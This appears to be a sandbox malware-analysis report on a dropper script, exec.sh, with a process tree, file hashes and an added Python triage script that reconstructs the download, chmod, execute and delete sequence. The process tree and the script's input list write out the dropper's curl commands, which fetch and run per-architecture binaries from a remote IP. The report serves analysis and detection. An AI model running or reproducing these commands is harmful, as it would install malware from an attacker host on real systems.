Analysis
- max time kernel: 149s
- max time network: 150s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240226-en
- resource tags: arch:mips, image:debian9-mipsbe-20240226-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 15-03-2024 20:08
- Static task: static1
- Behavioral task: behavioral1 (Sample: exec.sh, Resource: ubuntu1804-amd64-20240226-en)
- Behavioral task: behavioral2 (Sample: exec.sh, Resource: debian9-armhf-20240226-en)
- Behavioral task: behavioral3 (Sample: exec.sh, Resource: debian9-mipsbe-20240226-en; this report)
- Behavioral task: behavioral4 (Sample: exec.sh, Resource: debian9-mipsel-20240226-en)

General
- Target: exec.sh
- Size: 842B
- MD5: 4eeac4436b9c68f85b1c3a2bae62d3f3
- SHA1: 4895bfd63ba3ae5fd97f69c4a243d4bae7eddfa1
- SHA256: bfa195bd238473bfead86e74b796c4721d1f5281c284b96ff29d8806a82a6520
- SHA512: e0091672dd843f9dd87b50f43c8b09711cd1b02c40a5a8e51a53878cdd213881328583e99d1d92aef5c497abdd3f181fe6f3a740aedb7d66918c05788bbd0e5b
Malware Config
Signatures
- Executes dropped EXE (5 IoCs)
  Processes (ioc | pid | process):
  /tmp/386_binary | 772 | 386_binary
  /tmp/amd64_binary | 807 | amd64_binary
  /tmp/arm_binary | 812 | arm_binary
  /tmp/arm64_binary | 817 | arm64_binary
  /tmp/mips_binary | 822 | mips_binary
  Note: the report records the exec() of each dropped file but not its exit status. On this mipsbe image only the mips payload can run natively; the 386, amd64, arm and arm64 ELF files are of a foreign architecture. mips64_binary was downloaded (see "Writes file to tmp directory" and the Downloads section) but no chmod, exec or rm of it appears in the recorded trace, which ends after that download.
- Enumerates kernel/hardware configuration (1 TTP, 1 IoC)
  Reads contents of /sys virtual filesystem to enumerate system information.
  Processes (description | ioc | process):
  File opened for reading | /sys/kernel/mm/transparent_hugepage/hpage_pmd_size | mips_binary
  Note: this is the only /sys access recorded and it comes from the one payload that is native to the sandbox. The file is commonly read at startup by runtimes that size their heap to transparent huge pages (the Go runtime does this), so on its own it is a weak signal.
- Reads runtime system information (6 IoCs)
  Reads data from /proc virtual filesystem.
  Processes (description | ioc | process):
  File opened for reading | /proc/sys/crypto/fips_enabled | curl (6 occurrences, one per curl invocation)
  Note: this is the FIPS-mode probe that curl's TLS stack (GnuTLS/libgcrypt on Debian) performs at library initialisation. It is a benign side effect of running curl, not dropper behaviour; the signal here is the sequence of curl invocations, not the /proc read.
- Writes file to tmp directory (6 IoCs)
  Malware often drops required files in the /tmp directory.
  Processes (description | ioc | process):
  File opened for modification | /tmp/mips64_binary | curl
  File opened for modification | /tmp/386_binary | curl
  File opened for modification | /tmp/amd64_binary | curl
  File opened for modification | /tmp/arm_binary | curl
  File opened for modification | /tmp/arm64_binary | curl
  File opened for modification | /tmp/mips_binary | curl
Processes
- /tmp/exec.sh (cmdline: /tmp/exec.sh)
  - /usr/bin/curl (cmdline: curl -o 386_binary http://5.10.249.153:9999/386)
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/chmod (cmdline: chmod +x 386_binary)
  - /tmp/386_binary (cmdline: ./386_binary)
    - Executes dropped EXE
  - /bin/rm (cmdline: rm -rf 386_binary)
  - /usr/bin/curl (cmdline: curl -o amd64_binary http://5.10.249.153:9999/amd64)
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/chmod (cmdline: chmod +x amd64_binary)
  - /tmp/amd64_binary (cmdline: ./amd64_binary)
    - Executes dropped EXE
  - /bin/rm (cmdline: rm -rf amd64_binary)
  - /usr/bin/curl (cmdline: curl -o arm_binary http://5.10.249.153:9999/arm)
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/chmod (cmdline: chmod +x arm_binary)
  - /tmp/arm_binary (cmdline: ./arm_binary)
    - Executes dropped EXE
  - /bin/rm (cmdline: rm -rf arm_binary)
  - /usr/bin/curl (cmdline: curl -o arm64_binary http://5.10.249.153:9999/arm64)
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/chmod (cmdline: chmod +x arm64_binary)
  - /tmp/arm64_binary (cmdline: ./arm64_binary)
    - Executes dropped EXE
  - /bin/rm (cmdline: rm -rf arm64_binary)
  - /usr/bin/curl (cmdline: curl -o mips_binary http://5.10.249.153:9999/mips)
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/chmod (cmdline: chmod +x mips_binary)
  - /tmp/mips_binary (cmdline: ./mips_binary)
    - Executes dropped EXE
    - Enumerates kernel/hardware configuration
  - /bin/rm (cmdline: rm -rf mips_binary)
  - /usr/bin/curl (cmdline: curl -o mips64_binary http://5.10.249.153:9999/mips64)
    - Reads runtime system information
    - Writes file to tmp directory

The recorded trace ends here: no chmod, exec or rm of mips64_binary was observed within the 150 s run. Every payload follows the same four-step lifecycle in /tmp (curl download, chmod +x, execute, rm -rf), all fetched over plain HTTP from the single endpoint 5.10.249.153:9999, with the path naming the target architecture.
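The lifecycle above (download, chmod, exec, rm, repeated once per architecture) is the pattern a triage script should reconstruct rather than the individual /proc reads. The following is an added example, not part of the sandbox report or of the sample: it replays the child command lines of /tmp/exec.sh (transcribed here as a constructed list in recorded order) through a small per-file state tracker, extracts the remote endpoint and URLs as IoCs, flags the multi-architecture spraying pattern, and reports files whose lifecycle stopped short, which is exactly what happens to mips64_binary. The regexes, function names and the `>= 2 executed files` threshold are assumptions of this example.

```python
"""Replay a dropper's child command lines and reconstruct the per-file
download -> chmod -> exec -> rm lifecycle, then emit IoCs and a verdict."""
import os
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Constructed input: the child command lines of /tmp/exec.sh, transcribed in
# recorded order from the process tree above. This is not sandbox output.
SAMPLE_CMDLINES = [
    "curl -o 386_binary http://5.10.249.153:9999/386",
    "chmod +x 386_binary",
    "./386_binary",
    "rm -rf 386_binary",
    "curl -o amd64_binary http://5.10.249.153:9999/amd64",
    "chmod +x amd64_binary",
    "./amd64_binary",
    "rm -rf amd64_binary",
    "curl -o arm_binary http://5.10.249.153:9999/arm",
    "chmod +x arm_binary",
    "./arm_binary",
    "rm -rf arm_binary",
    "curl -o arm64_binary http://5.10.249.153:9999/arm64",
    "chmod +x arm64_binary",
    "./arm64_binary",
    "rm -rf arm64_binary",
    "curl -o mips_binary http://5.10.249.153:9999/mips",
    "chmod +x mips_binary",
    "./mips_binary",
    "rm -rf mips_binary",
    "curl -o mips64_binary http://5.10.249.153:9999/mips64",
]

STAGES = ("download", "chmod", "exec", "rm")

# Hypothetical patterns for the four tool invocations the report shows.
CURL_RE = re.compile(r"^curl\b.*?(?:-o|--output)\s+(\S+)\s+(\S+://\S+)")
CHMOD_RE = re.compile(r"^chmod\s+\+x\s+(\S+)")
EXEC_RE = re.compile(r"^(\./\S+|/\S+)$")
RM_RE = re.compile(r"^rm\s+(?:-\w+\s+)*(\S+)$")


@dataclass
class DroppedFile:
    name: str
    url: str = ""
    stages: list = field(default_factory=list)

    def complete(self) -> bool:
        """True when all four lifecycle steps were seen, in order."""
        return self.stages == list(STAGES)


def reconstruct(cmdlines):
    """Map basename -> DroppedFile built from the ordered command lines."""
    files = {}

    def entry(path):
        name = os.path.basename(path)
        return files.setdefault(name, DroppedFile(name))

    for cmd in cmdlines:
        cmd = cmd.strip()
        if m := CURL_RE.match(cmd):
            d = entry(m.group(1))
            d.url = m.group(2)
            d.stages.append("download")
        elif m := CHMOD_RE.match(cmd):
            entry(m.group(1)).stages.append("chmod")
        elif m := EXEC_RE.match(cmd):
            entry(m.group(1)).stages.append("exec")
        elif m := RM_RE.match(cmd):
            entry(m.group(1)).stages.append("rm")
    return files


def iocs(files):
    """Download URLs and the remote endpoints (host:port) they point at."""
    urls = sorted(d.url for d in files.values() if d.url)
    hosts = sorted({urlsplit(u).netloc for u in urls})
    return urls, hosts


def verdict(files):
    """Flag the arch-spraying pattern (several files downloaded and executed
    by one script) and list files whose lifecycle stopped short, e.g. because
    the trace ended right after the download."""
    executed = [n for n, d in files.items() if {"download", "exec"} <= set(d.stages)]
    incomplete = [n for n, d in files.items() if not d.complete()]
    flagged = len(executed) >= 2  # assumed threshold for this example
    return flagged, executed, incomplete


if __name__ == "__main__":
    tracked = reconstruct(SAMPLE_CMDLINES)
    flagged, executed, incomplete = verdict(tracked)
    urls, hosts = iocs(tracked)
    print("dropper pattern:", "FLAGGED" if flagged else "not seen")
    print("executed:", ", ".join(executed))
    print("incomplete lifecycle:", ", ".join(incomplete))
    print("remote endpoints:", ", ".join(hosts))
    for u in urls:
        print("  ", u)
```

In a real deployment the input would be exec events from auditd or a process-monitoring sensor, keyed on the parent shell, rather than a transcribed list; the tracker only needs ordered command lines, so it is independent of the sandbox. Stage order matters: `complete()` checks the exact download, chmod, exec, rm sequence, so a file that is executed before being downloaded or is never removed is reported as incomplete rather than silently counted.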
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- /tmp/386_binary
  - Filesize: 16KB
  - MD5: 8975168de4391197559b2f96e15fb056
  - SHA1: 89ac1b3951d3ffdf5a86c518307645fcb3431228
  - SHA256: 21ce8bef4ef651429ab50a7e748b2c33f07c4c3e4e8dfbb26a6e638e1b00438d
  - SHA512: 0d177ab6ea136c6e945d51a5cc2c48af3c3dc29fcaf71ceeb47042b8aeef60164b6d4d9d1d4b85b56f345b4a6fea72043726d26765b1c509aeaafdfe09a6c820
- /tmp/amd64_binary
  - Filesize: 816KB
  - MD5: 5ee7798fe4bb39b35ce9f710425ee4bb
  - SHA1: 330347669e995bdf51baeae79188eed75c8c60ba
  - SHA256: 02d52f896362869a3e885447857101742819d8fbc3ab478c6e9f4d7fc4805fc5
  - SHA512: ea9dcc87ea28c18db5ba0a6d9ae8737961e260f8e67f8dcff8bda97a8c75a6d68ceefd13651e4435c65b380add0f6f3797e0f1150d3d6788796d8433178b91f1
- /tmp/arm64_binary
  - Filesize: 44KB
  - MD5: 63b89e43233dcaa7366b7cb46ed7424c
  - SHA1: 2108c75082c408738bb5ddfab07aae7db5e2fa50
  - SHA256: 3fcd72d0c272e41746c9ff31f29088e16a2ea7fd6259197907ec70720e1c8b4e
  - SHA512: 583f7414c8d1e5289925786a88861b50e92b70c5934d4a5faff1a41fde8e201f66e763bac300ed4cf062957c2ec46699f64b221fc92d925e24ba04be32821254
- /tmp/arm_binary
  - Filesize: 436KB
  - MD5: ffb97d9ccd511fe0b32ff82b0d80e55e
  - SHA1: 93ca73bff89bab2c9af14682126e50519a965b27
  - SHA256: 7beda89d1c7f88be91bdca69a0f1d7dfac4f9e936f23b53f9d1f25af34cce646
  - SHA512: 5858adfe5c356042a0624d0e67d4d1fff1c75b5dd36827f2720d4285f584dbd973fb760bbe09bf139e6da6088f9952d921c24b681388f523b511c4b4a154cbc3
- /tmp/mips64_binary
  - Filesize: 4KB
  - MD5: 4cfbb8f1b2fcf8bf9b1d0c6b3912e27b
  - SHA1: c55d9b1f14156d86a1c98b8063817b38d1f370f3
  - SHA256: b384940943eddd69acd75088ca3b7c25fe0c921d6d233a0cdd89a3e02c405870
  - SHA512: a616c20e1a9d5ec1670a1810967dcdd39fcf885075ca4ba9c34fce9c2ad205a4f22ccb8ae23778c468796c5fbc6192afbc5ff8f5dd8ad711763068519691d5a7
- /tmp/mips_binary
  - Filesize: 516KB
  - MD5: ac7a872d0ed94926591bde3871f679de
  - SHA1: 62b52e32c150cde4e167b251226f1ffa9ae01f74
  - SHA256: d5afc60887de99b8158368d459938cdf40373724851884c7c37f4f1c6092e3ef
  - SHA512: 9b4f84ac869bb7f40721b28c2b3af5746def508038c15c431745df1c185213605b01148be66126b9f3c7f98e27681b0ba2b829f1f4595338a950de2673ff5b88

Note: the six files carry distinct hashes, so each is a separate artefact rather than one payload re-fetched under different names. The mips64 download is 4KB, an order of magnitude smaller than the other payloads; check its content (file type, whether it is an ELF at all) before treating its hash as that of a working payload.